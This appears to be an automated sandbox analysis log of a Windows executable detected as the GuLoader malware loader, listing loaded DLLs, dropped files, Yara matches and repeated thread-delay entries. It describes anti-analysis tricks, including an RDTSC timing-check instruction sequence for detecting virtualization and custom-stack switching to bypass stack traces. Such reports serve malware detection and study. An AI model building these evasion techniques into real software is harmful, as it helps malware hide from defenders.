Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File written: C:\Users\user\AppData\Local\Temp\Alpha.ini

Jump to behavior

Source: BtCQu5APhK.exe

Static file information: File size 1053154 > 1048576

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: BtCQu5APhK.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.1690708492.000000000727F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_10002DB0 push eax; ret	0_2_10002DDE
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_3_0767CF4A push eax; iretd	8_3_0767CF4D
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_3_0767EE31 push eax; iretd	8_3_0767EE65
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_3_0767EE8C push eax; iretd	8_3_0767EEA9
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07639C30 push esp; retf 0765h	8_2_07639D55
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07638DDF push esp; iretd	8_2_07638DE0
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_07638C2F pushfd ; iretd	8_2_07638C30
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0763891E pushad ; iretd	8_2_0763891F

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

File created: C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Nontranscribing.Afk	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Litiscontest.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Sproglyde.Mes	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Tiggerstavens.fes	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Udgyd.ini	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\Udtrttede.ini	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\aktioners.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\begrdeliges.pro	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\burdie.ini	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\cartographer.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\histographies.txt	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\vrfterne\icekhana.txt	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\manxman.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\modstaaet.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\musicianer.spi	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\ndder.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\romantiserendes.ini	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\semiquadrangle.ini	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\sugarcane.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\tinkle.jpg	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\separationerne\unagitatedness.txt	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	API/Special instruction interceptor: Address: 7ADD5AC
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	API/Special instruction interceptor: Address: 3E3D5AC

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	RDTSC instruction interceptor: First address: 7A75EFE second address: 7A75EFE instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAE5873EB0Fh 0x00000008 test cx, ax 0x0000000b cmp cx, bx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test bx, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	RDTSC instruction interceptor: First address: 3DD5EFE second address: 3DD5EFE instructions: 0x00000000 rdtsc 0x00000002 cmp al, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FAE58DA036Fh 0x00000008 test cx, ax 0x0000000b cmp cx, bx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 test bx, dx 0x00000013 rdtsc

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Memory allocated: 75F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Memory allocated: 37F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Memory allocated: 37D90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599636	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599470	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599213	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599070	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596544	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 596240	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595989	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 594080	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 593843	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Window / User API: threadDelayed 1405			Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Window / User API: threadDelayed 8444			Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg9317.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 1636	Thread sleep count: 1405 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 1636	Thread sleep count: 8444 > 30	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599636s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599213s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -599070s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596544s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -596240s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595989s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -594080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe TID: 5572	Thread sleep time: -593843s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0040276E FindFirstFileW,	8_2_0040276E
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_00405770
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Code function: 8_2_0040622B FindFirstFileW,FindClose,	8_2_0040622B

Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\BtCQu5APhK.exe	Thread delayed: delay time: 599750	Jump to behavior
